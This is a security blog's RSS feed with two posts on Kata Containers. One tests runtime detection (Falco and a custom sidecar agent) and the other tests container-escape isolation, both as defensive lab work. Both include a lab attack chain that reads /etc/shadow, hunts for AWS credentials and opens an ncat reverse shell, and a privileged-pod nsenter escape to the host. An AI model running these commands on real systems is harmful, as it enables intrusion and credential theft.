<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[CloudSecBurrito]]></title><description><![CDATA[A hands-on look at the tools behind modern security — cloud-native, open source, and everything in between.]]></description><link>https://cloudsecburrito.com</link><image><url>https://cdn.hashnode.com/res/hashnode/image/upload/v1748931377248/7982496c-2dd7-4886-936e-14682980484b.png</url><title>CloudSecBurrito</title><link>https://cloudsecburrito.com</link></image><generator>RSS for Node</generator><lastBuildDate>Wed, 08 Apr 2026 14:10:15 GMT</lastBuildDate><atom:link href="https://cloudsecburrito.com/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><item><title><![CDATA[Runtime Security in Kata: Less Visibility, Better Signal]]></title><description><![CDATA[Kata containers give you a stronger boundary. That is the point.
But that boundary also breaks a lot of the assumptions we rely on for runtime security. The usual model works because containers share ]]></description><link>https://cloudsecburrito.com/runtime-security-in-kata-less-visibility-better-signal</link><guid isPermaLink="true">https://cloudsecburrito.com/runtime-security-in-kata-less-visibility-better-signal</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[virtual machine]]></category><category><![CDATA[kata]]></category><category><![CDATA[Security]]></category><category><![CDATA[containers]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Thu, 02 Apr 2026 02:18:12 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/68257779e3a1e2ca713dae3c/0cc0cd3f-2696-4e4a-af6c-8ff94d0ecad1.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Kata containers give you a stronger boundary. That is the point.</p>
<p>But that boundary also breaks a lot of the assumptions we rely on for runtime security. The usual model works because containers share a kernel. You get visibility from the host, you stream syscalls, and you build detections on top of that.</p>
<p>Kata changes that.</p>
<p>Now there is a guest kernel in the way, and “just look at the host” stops being enough. At some point, adding more host-level telemetry does not help. You are just looking harder from the wrong side of the wall.</p>
<p>So instead of trying to force the usual model to fit, I went in the other direction: figure out what actually matters inside the workload and build around that.</p>
<p>This post does two things:</p>
<ol>
<li><p>Show the normal runtime-security model with a quick Falco sanity check in a standard container and then in Kata.</p>
</li>
<li><p>Show why the answer in Kata is not “get every syscall back,” but “collect the right signals from inside the workload boundary.”</p>
</li>
</ol>
<hr />
<h2>Diagrams</h2>
<h3>What you would need if you insisted on the old model</h3>
<img src="https://cdn.hashnode.com/uploads/covers/68257779e3a1e2ca713dae3c/769a6f2d-13ea-49a4-8d5a-42eae17c29aa.png" alt="" style="display:block;margin:0 auto" />

<p>This is the awkward reality in Kata. The workload sits behind a guest kernel, so host Falco is no longer observing the workload the same way it would in a shared-kernel container runtime. If you want syscall-centric visibility all the way through, you start drifting toward a two-layer model: one perspective in the guest, one on the host, and a lot more complexity than “just deploy Falco.”</p>
<h3>The model we actually care about</h3>
<img src="https://cdn.hashnode.com/uploads/covers/68257779e3a1e2ca713dae3c/b8f26ddc-7e3f-419d-af80-de55325d7677.png" alt="" style="display:block;margin:0 auto" />

<p>This is the practical model. Keep the host boundary intact. Do not try to recreate a full runtime platform inside the guest. Put a small agent next to the workload, capture a handful of high-signal behaviors, and ship them somewhere useful.</p>
<hr />
<h2>Quick reset: what actually changed</h2>
<p>In a normal Kubernetes setup:</p>
<ul>
<li><p>containers share the host kernel</p>
</li>
<li><p>syscalls are visible from the host</p>
</li>
<li><p>runtime detection lives comfortably at that layer</p>
</li>
</ul>
<p>That is why tools like Falco work so well in standard container environments. The observation point matches the workload.</p>
<p>With Kata:</p>
<ul>
<li><p>each pod runs inside its own lightweight VM</p>
</li>
<li><p>syscalls terminate inside the guest kernel</p>
</li>
<li><p>the host sees less, and sometimes sees it differently</p>
</li>
</ul>
<p>The important part is not just “less visibility.” It is that the <strong>observation point moved</strong>. A Kata pod is not just a more isolated container. It is a workload running behind its own kernel boundary. That means host-level runtime tooling is no longer standing in the same place relative to the process you care about.</p>
<hr />
<h2>Lightning baseline: Falco on a normal container</h2>
<p>Before arguing with the model, it is worth doing the easy sanity check.</p>
<h3>Fast deploy</h3>
<p>Quick and dirty Falco deploy.</p>
<pre><code class="language-bash">helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update

helm upgrade --install falco falcosecurity/falco \
  -n falco \
  --create-namespace \
  --set falcosidekick.enabled=true \
  --set falcosidekick.webui.enabled=true
</code></pre>
<p>That is enough for a quick lab check. No giant tuning exercise. No twenty-page values file. Just get Falco running and confirm the standard model still behaves like the standard model.</p>
<h3>Test workload</h3>
<p>A plain container is enough:</p>
<pre><code class="language-yaml">apiVersion: v1
kind: Pod
metadata:
  name: normal-app
  namespace: default
  labels:
    app: normal-app
spec:
  restartPolicy: Never
  containers:
    - name: app
      image: debian:stable-slim
      command: ["/bin/sh", "-c"]
      args:
        - |
          apt-get update &amp;&amp; apt-get install -y procps findutils &amp;&amp; \
          sleep 3600
</code></pre>
<p>Apply it:</p>
<pre><code class="language-bash">kubectl apply -f normal-pod.yaml
</code></pre>
<h3>A singular attack worth testing</h3>
<p>For this comparison, let’s not just “spawn a shell.” Let’s try a sequence of events:</p>
<ol>
<li><p>exec in</p>
</li>
<li><p>read sensitive file</p>
</li>
<li><p>browse for aws creds</p>
</li>
<li><p>install ncat</p>
</li>
<li><p>spawn reverse shell</p>
</li>
</ol>
<p>That gives you a decent mini attack chain.</p>
<p>Example:</p>
<pre><code class="language-bash">kubectl exec -it normal-app -- /bin/bash

# inside the container
cat /etc/shadow
find / -iname ".aws/credentials" 2&gt;/dev/null
apt install ncat -y
ncat --exec /bin/sh 10.244.0.1 4444 #run nc -lvnp 4444 from attacker machine
</code></pre>
<h3>What you expect to see</h3>
<p>In a standard container runtime, Falco is in its natural habitat. Assuming Falco defaults, you should see signal around sensitive file access, finding aws creds, dropping a new binary, and launching a reverse shell. While this could vary a bit, the main point is simple:</p>
<blockquote>
<p>in a shared-kernel container, host-level syscall monitoring lines up with the workload you are testing</p>
</blockquote>
<p>No mystery. No special pleading. The baseline works. As we can see in this snippet from Falco Sidekick.</p>
<img src="https://cdn.hashnode.com/uploads/covers/68257779e3a1e2ca713dae3c/65251ace-bb2e-4690-acdd-28a253c2379a.png" alt="" style="display:block;margin:0 auto" />

<h3>Run the same thing in Kata</h3>
<p>Now take basically the same pod and move it to Kata:</p>
<pre><code class="language-yaml">apiVersion: v1
kind: Pod
metadata:
  name: kata-app
  namespace: default
  labels:
    app: kata-app
spec:
  runtimeClassName: kata-qemu
  restartPolicy: Never
  containers:
    - name: app
      image: debian:stable-slim
      command: ["/bin/sh", "-c"]
      args:
        - |
          apt-get update &amp;&amp; apt-get install -y netcat-openbsd procps findutils &amp;&amp; \
          sleep 3600
</code></pre>
<p>Apply it:</p>
<pre><code class="language-bash">kubectl apply -f kata-pod.yaml
</code></pre>
<p>Then run the same sequence:</p>
<pre><code class="language-bash">kubectl exec -it kata-app -- /bin/bash

# inside the container
cat /etc/shadow
find / -iname ".aws/credentials" 2&gt;/dev/null
apt install ncat -y
ncat --exec /bin/sh 10.244.0.1 4444 #run nc -lvnp 4444 from attacker machine
</code></pre>
<p>And you'll see nothing. The workload is now behind a guest kernel. That means the host Falco sensor is no longer seeing the same direct syscall stream it gets in a normal container model.</p>
<p>But here is the point.</p>
<blockquote>
<p>This is not a Falco failure, and it is not a Kata bug. This is the boundary doing its job.</p>
</blockquote>
<p>Kata is supposed to change the isolation model. If the runtime boundary changes, the detection model has to change with it.</p>
<hr />
<h2>Why I am not going to put Falco inside Kata</h2>
<p>This is where the line starts to matter. Could you try to push harder on syscall-centric detection inside Kata? Sure.</p>
<p>You could put Falco into the container. But I don't think the juice is worth the squeeze.</p>
<p>I am not working with a giant production fleet here. This is a sandboxed workload, not a sea of hundreds of ordinary containers. I do not have the luxury of just collecting everything and tuning it forever. And more importantly, Kata is not trying to be “regular containers, but a little stronger.” It is a different boundary with different tradeoffs.</p>
<p>So my question changes too.</p>
<p>Instead of asking:</p>
<ul>
<li><p>how do I get all my syscalls back?</p>
</li>
<li><p>how do I make Falco see everything it used to see?</p>
</li>
</ul>
<p>I am asking:</p>
<blockquote>
<p>what do I actually need to observe, from inside this workload, to know something meaningful is happening?</p>
</blockquote>
<p>That leads to a much smaller and much more defensible list:</p>
<ul>
<li><p>shell execution</p>
</li>
<li><p>recon behavior</p>
</li>
<li><p>installing new binaries</p>
</li>
<li><p>reverse shell</p>
</li>
<li><p>suspicious outbound connections</p>
</li>
<li><p>process chains that look like an attack rather than normal app behavior</p>
</li>
</ul>
<p>That is the design center for the micro-agent. Just enough signal, from the right side of the boundary, to tell me when a sandboxed workload starts acting like an attacker lives there now.</p>
<hr />
<h2>The micro-agent: less visibility, actual signal</h2>
<p>The <a href="https://github.com/sf-matt/theburrito/tree/main/kata-microagent">micro-agent</a> is deliberately simple:</p>
<ul>
<li><p>it runs as a sidecar inside the Kata pod</p>
</li>
<li><p>it polls <code>/proc</code> for running processes</p>
</li>
<li><p>it applies a small set of rules focused on high-signal behavior</p>
</li>
<li><p>it ships events to a lightweight receiver with a UI</p>
</li>
</ul>
<p>That’s it. No kernel hooks. No syscall stream. No attempt to reconstruct the host view. Instead, it answers a narrower question:</p>
<blockquote>
<p>what is this workload actually doing right now?</p>
</blockquote>
<h3>What it looks for</h3>
<p>The detection model maps directly to the behaviors I actually care about:</p>
<ul>
<li><p>shell execution inside the workload</p>
</li>
<li><p>access to sensitive files (<code>/etc/shadow</code>)</p>
</li>
<li><p>credential discovery (<code>.aws/credentials</code>)</p>
</li>
<li><p>package manager usage (<code>apt-get install</code>, <code>apk add</code>, etc.)</p>
</li>
<li><p>execution of newly introduced binaries</p>
</li>
<li><p>network utilities used for remote execution (<code>ncat --exec</code>, <code>nc -e</code>)</p>
</li>
</ul>
<p>This is not exhaustive. It is intentionally selective. Each rule is simple:</p>
<ul>
<li><p>match a process name</p>
</li>
<li><p>optionally match a command-line pattern</p>
</li>
<li><p>emit a structured event</p>
</li>
</ul>
<p>For example:</p>
<ul>
<li><p><code>cat /etc/shadow</code> → <code>shadow_file_access</code></p>
</li>
<li><p><code>apt-get install -y ncat</code> → <code>package_manager_execution</code></p>
</li>
<li><p><code>ncat --exec /bin/sh ...</code> → <code>nc_execution</code></p>
</li>
</ul>
<p>No magic. Just picking signals that actually mean something.</p>
<h3>Approximating “drop and execute”</h3>
<p>Falco can tell you that a binary came from the container’s writable layer. Inside the workload, I do not have that context. No overlayfs view. No runtime metadata.</p>
<p>So I approximate it:</p>
<ol>
<li><p>build a baseline of executable paths when the container starts</p>
</li>
<li><p>watch for new processes</p>
</li>
<li><p>if a process executes a binary that was not present at startup, flag it</p>
</li>
</ol>
<p>That becomes:</p>
<ul>
<li><code>post_start_binary_execution</code></li>
</ul>
<p>It is not perfect. It does not know <em>why</em> the binary is new. But it captures what matters:</p>
<blockquote>
<p>something showed up after startup, and now it is running</p>
</blockquote>
<hr />
<h2>Running the same attack chain</h2>
<p>So now I run the same Kata app, but with the sensor.</p>
<pre><code class="language-yaml">apiVersion: v1
kind: Pod
metadata:
  name: kata-app
  namespace: kata-demo
  labels:
    app: kata-app
spec:
  runtimeClassName: kata-qemu
  shareProcessNamespace: true
  restartPolicy: Never
  containers:
    - name: app
      image: debian:stable-slim
      imagePullPolicy: Always
      command: ["/bin/sh", "-c"]
      args:
        - |
          sleep 3600

    - name: sensor
      image: sfmatt/kata-sensor:latest
      imagePullPolicy: Always
      env:
        - name: RECEIVER_URL
          value: "http://kata-receiver.kata-demo.svc.cluster.local/events"
        - name: POLL_INTERVAL
          value: "2"
        - name: HEARTBEAT_INTERVAL
          value: "15"
        - name: MODE
          value: "kata"
        - name: EXPECTED_PROCESSES
          value: "sleep"
        - name: POD_NAME
          valueFrom:
            fieldRef:
              fieldPath: metadata.name
        - name: POD_NAMESPACE
          valueFrom:
            fieldRef:
              fieldPath: metadata.namespace
</code></pre>
<p>And I run the receiver (poor man's Falco Sidekick) as well.</p>
<pre><code class="language-plaintext">apiVersion: v1
kind: Namespace
metadata:
  name: kata-demo
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: kata-receiver
  namespace: kata-demo
spec:
  replicas: 1
  selector:
    matchLabels:
      app: kata-receiver
  template:
    metadata:
      labels:
        app: kata-receiver
    spec:
      containers:
        - name: receiver
          image: sfmatt/kata-receiver:latest
          imagePullPolicy: Always
          ports:
            - containerPort: 8080
---
apiVersion: v1
kind: Service
metadata:
  name: kata-receiver
  namespace: kata-demo
spec:
  type: NodePort
  selector:
    app: kata-receiver
  ports:
    - name: http
      port: 80       
      targetPort: 8080  
      nodePort: 30080  
</code></pre>
<p>Apply these. With the sensor pod and receiver running, I execute the same sequence inside the container:</p>
<pre><code class="language-bash">kubectl exec -it -n kata-demo kata-app -- /bin/bash

# inside the container
tail -f /etc/shadow
sh -c 'while true; do find / -path "*/.aws/credentials" 2&gt;/dev/null; sleep 1; done'
apt update &amp;&amp; apt install ncat -y
ncat --exec /bin/sh 10.244.0.1 4444 # run nc -lvnp 4444 from attacker machine
</code></pre>
<p>And the output is exactly what I need:</p>
<ol>
<li><p><code>unexpected_shell</code></p>
</li>
<li><p><code>shadow_file_access</code></p>
</li>
<li><p><code>aws_credential_discovery</code></p>
</li>
<li><p><code>package_manager_execution</code></p>
</li>
<li><p><code>post_start_binary_execution</code></p>
</li>
<li><p><code>nc_execution</code></p>
</li>
</ol>
<img src="https://cdn.hashnode.com/uploads/covers/68257779e3a1e2ca713dae3c/04efc02b-290d-4338-9629-ba26dedb0a44.png" alt="" style="display:block;margin:0 auto" />

<p>That’s the whole story. No massive ruleset. Six events. This is not about replacing Falco. It is about proving a different point:</p>
<blockquote>
<p>inside a sandboxed workload, you can still get meaningful runtime signal without rebuilding full system visibility</p>
</blockquote>
<p>The signal is smaller. The implementation is simpler. But the outcome is still useful.</p>
<h3>Perfect is the enemy of the good</h3>
<p>There are obvious gaps:</p>
<ol>
<li><p>this is polling-based</p>
</li>
<li><p>fast, short-lived processes can be missed</p>
</li>
<li><p>there is no kernel-level visibility</p>
</li>
<li><p>“new binary” detection is a heuristic, not ground truth</p>
</li>
<li><p>this hasn’t been hardened or security tested</p>
</li>
</ol>
<p>But those tradeoffs are intentional. I’m not trying to rebuild the host from inside the guest. I’m trying to answer a simpler question:</p>
<blockquote>
<p>does this workload look like it just got compromised?</p>
</blockquote>
<p>And for this scenario, six signals is enough to answer that with confidence.</p>
<hr />
<h2>Wrapup</h2>
<p>This is a starting point, not an endpoint. Zooming out:</p>
<ul>
<li><p>what is the minimal detection model that actually works across sandboxed runtimes?</p>
</li>
<li><p>which signals survive isolation boundaries consistently?</p>
</li>
<li><p>how do you combine admission + runtime + workload-local context into something coherent?</p>
</li>
</ul>
<p>I don’t think the answer is “just run Falco inside the guest.” This isn’t about seeing everything. It’s about seeing enough. Kata changes the boundary, so the detection model has to change too. And once you accept that, the problem gets smaller.</p>
<p>It’s a bit like watching your kid in a sandbox. You’re not responsible for the whole park, the playground, and every other kid running around. You’re focused on a small, defined space. If something weird happens in that sandbox, you’ll notice.</p>
<p>From experience, that’s a much more manageable problem.</p>
<p>And inside a sandboxed workload, that’s really the point. You don’t need global visibility. You need confidence that the thing in front of you isn’t starting to behave like something it shouldn’t.</p>
]]></content:encoded></item><item><title><![CDATA[Kata Containers: When "Container Escape" Stops Working]]></title><description><![CDATA[I wanted to try Kata Containers. Not in a "read the docs and feel informed" way, but in a burrito way. Which of course means: run it, break it, and see what actually changes.
Because on paper, Kata so]]></description><link>https://cloudsecburrito.com/kata-containers-when-container-escape-stops-working</link><guid isPermaLink="true">https://cloudsecburrito.com/kata-containers-when-container-escape-stops-working</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[kata]]></category><category><![CDATA[Security]]></category><category><![CDATA[containers]]></category><category><![CDATA[QEMU]]></category><category><![CDATA[virtual machine]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Wed, 25 Mar 2026 20:01:25 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/68257779e3a1e2ca713dae3c/28e2e33a-27e9-43c8-9e96-b94585d7ad3c.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>I wanted to try Kata Containers. Not in a "read the docs and feel informed" way, but in a burrito way. Which of course means: run it, break it, and see what actually changes.</p>
<p>Because on paper, Kata sounds like the answer to a question we've mostly hand-waved: <em>what if containers weren't just sharing the same kernel and hoping for the best?</em></p>
<p>So I did what I always do. I spun up…Spun up a quick Kubernetes lab, installed the runtime, applied a <code>RuntimeClass</code>, and waited for my pod to come up. It didn't. It just sat there. <code>ContainerCreating</code>. Mocking me. No obvious misconfig, no broken YAML, just enough of an error to suggest something deeper was wrong and not enough to tell me what.</p>
<p>After a bit of digging, the problem became clear: I wasn't missing configuration. I was missing a hypervisor. More specifically, I was trying to run VM-backed containers on infrastructure that had absolutely no intention of letting me run a VM inside it. My local lab VM? Not a chance. Apple Silicon says no.</p>
<p>So instead of fighting the environment, I changed it. I spun up a GCP instance with nested virtualization enabled and tried again. Same Kubernetes setup. Same RuntimeClass. Completely different result.</p>
<p>And that's when things finally started to work. But getting Kata running turned out to be the easy part. Understanding what it actually <em>changes</em>, especially for container security, is where things get interesting.</p>
<hr />
<h2>Diagram</h2>
<img src="https://cdn.hashnode.com/uploads/covers/68257779e3a1e2ca713dae3c/55144801-56ec-4261-90ed-320643d9f7aa.png" alt="" style="display:block;margin:0 auto" />

<p>This diagram shows the key difference between standard containers and Kata. In a normal setup, containers share the host kernel, which is why escapes can reach the node. With Kata, the workload runs inside a microVM with its own guest kernel, backed by KVM. The result is simple: the isolation boundary moves. Instead of going straight to the host, an escape attempt hits the VM boundary first.</p>
<hr />
<h2>Kata Containers Local Lab Failure</h2>
<p>I started by installing Kata directly into my Kubernetes lab using the official Helm chart. On the surface, everything looked fine.</p>
<p>The chart installed cleanly:</p>
<pre><code class="language-console">export VERSION=$(curl -sSL https://api.github.com/repos/kata-containers/kata-containers/releases/latest | jq .tag_name | tr -d '"')
export CHART="oci://ghcr.io/kata-containers/kata-deploy-charts/kata-deploy"
helm install kata-deploy "\({CHART}" --version "\){VERSION}"
</code></pre>
<p>A <code>kata-deploy</code> DaemonSet showed up, and RuntimeClasses were created:</p>
<pre><code class="language-console">matt@ciliumcontrolplane:~$ kubectl get runtimeclass
NAME                            HANDLER                         AGE
kata-clh                        kata-clh                        37s
kata-cloud-hypervisor           kata-cloud-hypervisor           37s
kata-dragonball                 kata-dragonball                 37s
kata-fc                         kata-fc                         37s
...
</code></pre>
<p>At this point, it looked like Kata was ready to go.</p>
<h4>Failure 1: kata-deploy installer issues</h4>
<p>The <code>kata-deploy</code> pod was not actually completing successfully. Its logs showed:</p>
<pre><code class="language-console">[2026-03-19T23:05:55Z INFO  kata_deploy::artifacts::install] Generating drop-in configuration files for shim: clh
[2026-03-19T23:05:55Z INFO  kata_deploy::artifacts::install] Setting up runtime directory for shim: cloud-hypervisor
Error: Configuration file not found: "/host/opt/kata/share/defaults/kata-containers/runtime-rs/runtimes/cloud-hypervisor/configuration-cloud-hypervisor.toml". This file should have been symlinked from the original config. Check that the shim 'cloud-hypervisor' has a valid configuration file in the artifacts.
</code></pre>
<p>The installer was attempting to configure multiple hypervisor shims, including <code>cloud-hypervisor</code>, but the expected configuration artifacts were not present. This meant the node was never fully prepared for Kata, even though Kubernetes objects like RuntimeClass were already created.</p>
<p>The fix is to stop trying to install everything and just enable a single, known-good shim. Create a Helm override file (<code>kata-override.yaml</code>):</p>
<pre><code class="language-yaml">shims:
  disableAll: true
  qemu:
    enabled: true
defaultShim:
  amd64: qemu
  arm64: qemu
</code></pre>
<p>Then reinstall the chart with the override:</p>
<pre><code class="language-console">helm uninstall kata-deploy

helm install kata-deploy "${CHART}" \
  --version "${VERSION}" \
  -f kata-override.yaml
</code></pre>
<p>Voilà! Now the installer skips the problematic shims, completes cleanly, and you finally have a usable kata-qemu runtime.</p>
<p>So now let's deploy a simple test pod using our kata-qemu runtime class:</p>
<pre><code class="language-yaml">apiVersion: v1
kind: Pod
metadata:
  name: kata-test
spec:
  runtimeClassName: kata-qemu
  containers:
    - name: nginx
      image: nginx:stable
</code></pre>
<p>Kubernetes accepted the pod and attempted to start it. The pod moved into <code>ContainerCreating</code>, which meant:</p>
<ul>
<li><p>Scheduling worked</p>
</li>
<li><p>The RuntimeClass was recognized</p>
</li>
<li><p>Kubernetes handed execution off to the runtime layer</p>
</li>
</ul>
<p>Then it failed.</p>
<h4>Failure 2: RuntimeClass exists, but runtime does not</h4>
<p>Despite the installer issues, the RuntimeClass still existed. This created a false sense that everything was configured correctly.</p>
<p>When the pod attempted to start, containerd produced the real error:</p>
<pre><code class="language-console">  Warning  FailedCreatePodSandBox  7s (x10 over 2m7s)  kubelet            Failed to create pod sandbox: rpc error: code = Unknown desc = failed to create containerd task: failed to create shim task: Could not create the sandbox resource controller failed to add any hypervisor device to devices cgroup: unknown
</code></pre>
<p>At this point, the problem finally became clear. Kubernetes had done its job. The RuntimeClass was valid. The scheduler placed the pod. Kata even got far enough to try launching the sandbox. But when it came time to actually create the VM-backed workload, the runtime had nothing to attach.</p>
<p>There was no usable hypervisor device. No /dev/kvm. No hardware-backed virtualization exposed to the node. Just a container runtime being asked to spin up a VM on infrastructure that fundamentally couldn’t support it.</p>
<p>And that’s a real requirement for Kata. Not just Kubernetes. Not just containerd. Actual access to virtualization through KVM.</p>
<hr />
<h2>GCP Fix</h2>
<p>Getting Kata to actually run came down to one thing: giving it a real hypervisor.</p>
<p>I landed on GCP for this. Not because I suddenly became a GCP fan, but because it’s relatively straightforward, reasonably priced, and doesn’t fight you too much when you ask for nested virtualization. More importantly, it’s easy to spin up and tear down with Terraform, which makes the whole experiment repeatable instead of a one-off science project.</p>
<p>The setup itself is not complicated, but it is very particular. You need a machine that actually supports virtualization features. I used a <code>n2-standard-4</code> with an Intel Cascade Lake CPU and Ubuntu, which is enough for a small lab.</p>
<p>The important part is enabling <a href="https://docs.cloud.google.com/compute/docs/instances/nested-virtualization/enabling">nested virtualization</a>. Without that, you’re back to the same failure mode as local: everything looks fine, Kubernetes objects exist, but nothing actually works because there’s no hypervisor underneath.</p>
<p>Once nested virtualization is enabled, you finally have what Kata has been quietly asking for the entire time: the ability to run a VM inside your node. At that point, the rest of the setup starts behaving the way the docs promised.</p>
<hr />
<h2>Reproducing the Lab on GCP</h2>
<p>Here is the Terraform I used to set the infra up: <a href="https://github.com/sf-matt/theburrito/tree/main/kata-gcp-k8s-lab">https://github.com/sf-matt/theburrito/tree/main/kata-gcp-k8s-lab</a>. This gets you a small but workable lab with the things Kata actually cares about:</p>
<ul>
<li><p>nested virtualization enabled</p>
</li>
<li><p>Intel Haswell minimum CPU platform</p>
</li>
<li><p>Ubuntu 22.04</p>
</li>
<li><p>Kubernetes installed at boot</p>
</li>
<li><p>Helm installed at boot</p>
</li>
</ul>
<p>Once the instance is up and you can SSH in, I chose to use the SSH-in-browser, but pick your poison.</p>
<h3>Set up kubectl</h3>
<p>Just do the basics.</p>
<pre><code class="language-sh">mkdir -p $HOME/.kube
sudo cp /etc/kubernetes/admin.conf $HOME/.kube/config
sudo chown \((id -u):\)(id -g) $HOME/.kube/config
</code></pre>
<h3>Validate the node</h3>
<p>Check a few things:</p>
<ul>
<li><p>Health of node</p>
</li>
<li><p>Presence of <code>/dev/kvm</code></p>
</li>
<li><p>Health of pods</p>
</li>
</ul>
<pre><code class="language-console">matt@kata-k8s-node:~$ kubectl get nodes
NAME            STATUS   ROLES           AGE   VERSION
kata-k8s-node   Ready    control-plane   10m   v1.32.13
matt@kata-k8s-node:~$ ls /dev/kvm 
/dev/kvm
matt@kata-k8s-node:~$ kubectl get po -A
NAMESPACE      NAME                                    READY   STATUS    RESTARTS   AGE
kube-flannel   kube-flannel-ds-wvchr                   1/1     Running   0          11m
kube-system    coredns-668d6bf9bc-2xllc                1/1     Running   0          11m
kube-system    coredns-668d6bf9bc-9vgrm                1/1     Running   0          11m
kube-system    etcd-kata-k8s-node                      1/1     Running   0          11m
kube-system    kube-apiserver-kata-k8s-node            1/1     Running   0          11m
kube-system    kube-controller-manager-kata-k8s-node   1/1     Running   0          11m
kube-system    kube-proxy-4j4sc                        1/1     Running   0          11m
kube-system    kube-scheduler-kata-k8s-node            1/1     Running   0          11m
</code></pre>
<p>Assuming this looks good, you can proceed to setting up Kata.</p>
<h3>Install Kata</h3>
<p>First we set the variables.</p>
<pre><code class="language-console">export VERSION=$(curl -sSL https://api.github.com/repos/kata-containers/kata-containers/releases/latest | jq .tag_name | tr -d '"')
export CHART="oci://ghcr.io/kata-containers/kata-deploy-charts/kata-deploy"
</code></pre>
<p>Then just use Helm to install it.</p>
<pre><code class="language-console">helm install kata-deploy "\({CHART}" --version "\){VERSION}"
</code></pre>
<p>Check runtime classes. There will be a lot.</p>
<pre><code class="language-console">matt@kata-k8s-node:~$ kubectl get runtimeclass
NAME                            HANDLER                         AGE
kata-clh                        kata-clh                        105s
kata-cloud-hypervisor           kata-cloud-hypervisor           105s
kata-dragonball                 kata-dragonball                 105s
kata-fc                         kata-fc                         105s
kata-qemu                       kata-qemu                       105s
kata-qemu-cca                   kata-qemu-cca                   105s
kata-qemu-coco-dev              kata-qemu-coco-dev              105s
kata-qemu-coco-dev-runtime-rs   kata-qemu-coco-dev-runtime-rs   105s
kata-qemu-nvidia-gpu            kata-qemu-nvidia-gpu            105s
kata-qemu-nvidia-gpu-snp        kata-qemu-nvidia-gpu-snp        105s
kata-qemu-nvidia-gpu-tdx        kata-qemu-nvidia-gpu-tdx        105s
kata-qemu-runtime-rs            kata-qemu-runtime-rs            105s
kata-qemu-se                    kata-qemu-se                    105s
kata-qemu-se-runtime-rs         kata-qemu-se-runtime-rs         105s
kata-qemu-snp                   kata-qemu-snp                   105s
kata-qemu-snp-runtime-rs        kata-qemu-snp-runtime-rs        105s
kata-qemu-tdx                   kata-qemu-tdx                   105s
kata-qemu-tdx-runtime-rs        kata-qemu-tdx-runtime-rs        105s
</code></pre>
<hr />
<h2>Test Isolation</h2>
<p>Now on to the obligatory Netshoot container escape test. This was previously used to test Talos and how the OS surface was greatly reduced. But of course with Kata we can eliminate even that concern.</p>
<p>The deployments below are both non-Kata and Kata container. Save it as <code>escape.yaml</code>. I've chosen <code>kata-qemu</code> in this case.</p>
<pre><code class="language-yaml">apiVersion: apps/v1
kind: Deployment
metadata:
  name: normal-escape
spec:
  replicas: 1
  selector:
    matchLabels:
      app: normal-escape
  template:
    metadata:
      labels:
        app: normal-escape
        mode: normal
    spec:
      hostPID: true
      containers:
        - name: escape
          image: nicolaka/netshoot:latest
          command: ["sleep", "3600"]
          securityContext:
            privileged: true
          volumeMounts:
            - name: host-root
              mountPath: /host
      volumes:
        - name: host-root
          hostPath:
            path: /
            type: Directory
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: kata-escape
spec:
  replicas: 1
  selector:
    matchLabels:
      app: kata-escape
  template:
    metadata:
      labels:
        app: kata-escape
        mode: kata
    spec:
      runtimeClassName: kata-qemu
      hostPID: true
      containers:
        - name: escape
          image: nicolaka/netshoot:latest
          command: ["sleep", "3600"]
          securityContext:
            privileged: true
          volumeMounts:
            - name: host-root
              mountPath: /host
      volumes:
        - name: host-root
          hostPath:
            path: /
            type: Directory
</code></pre>
<p>Apply:</p>
<pre><code class="language-console">kubectl apply -f escape.yaml
</code></pre>
<h3>Let's Escape</h3>
<p>Let's grab the pods for easy exec access.</p>
<pre><code class="language-console">NORMAL_POD=$(kubectl get pod -l app=normal-escape -o jsonpath='{.items[0].metadata.name}')
KATA_POD=$(kubectl get pod -l app=kata-escape -o jsonpath='{.items[0].metadata.name}')
</code></pre>
<p>Then run the escape on normal pod.</p>
<pre><code class="language-console">matt@kata-k8s-node:~\( kubectl exec -it \)NORMAL_POD -- /bin/bash
normal-escape-746ccd6646-jqssr:~# uname -a
Linux normal-escape-746ccd6646-jqssr 6.8.0-1048-gcp #51~22.04.1-Ubuntu SMP Wed Feb 11 02:58:49 UTC 2026 x86_64 Linux
normal-escape-746ccd6646-jqssr:~# nsenter --target 1 --mount --uts --ipc --net --pid
# uname -a 
Linux kata-k8s-node 6.8.0-1048-gcp #51~22.04.1-Ubuntu SMP Wed Feb 11 02:58:49 UTC 2026 x86_64 x86_64 x86_64 GNU/Linux
</code></pre>
<p>Cool that was easy. Now on to Kata. Same exact sequence.</p>
<pre><code class="language-console">matt@kata-k8s-node:~\( kubectl exec -it \)KATA_POD -- /bin/bash
kata-escape-594b89bd47-tt95r:~# uname -a
Linux kata-escape-594b89bd47-tt95r 6.18.15 #1 SMP Tue Mar 17 01:39:00 UTC 2026 x86_64 Linux
kata-escape-594b89bd47-tt95r:~# nsenter --target 1 --mount --uts --ipc --net --pid
nsenter: failed to execute /bin/sh: No such file or directory
</code></pre>
<p>The same namespace escape that worked in a standard container failed in the Kata-backed pod. Not because the command was wrong, but because the target was no longer the host. It was the init process inside a VM. The escape attempt never reached the node.</p>
<hr />
<h2>Wrap Up</h2>
<p>Kata Containers are not complicated. Containers run inside a VM instead of directly on the host kernel. That’s the whole idea.</p>
<p>What can be complicated is everything around it. Getting the right infrastructure. Figuring out why things fail silently. Realizing that Kubernetes will happily accept your configuration even when the underlying runtime has no chance of working. Once you get past that, the behavior is very straightforward.</p>
<p>A normal container shares the host kernel. A privileged workload can pivot into host namespaces and, in the right conditions, reach the node.</p>
<p>A Kata-backed container does not. It runs with its own kernel inside a VM. The same escape attempt stops at that boundary. You are no longer one mistake away from the host.</p>
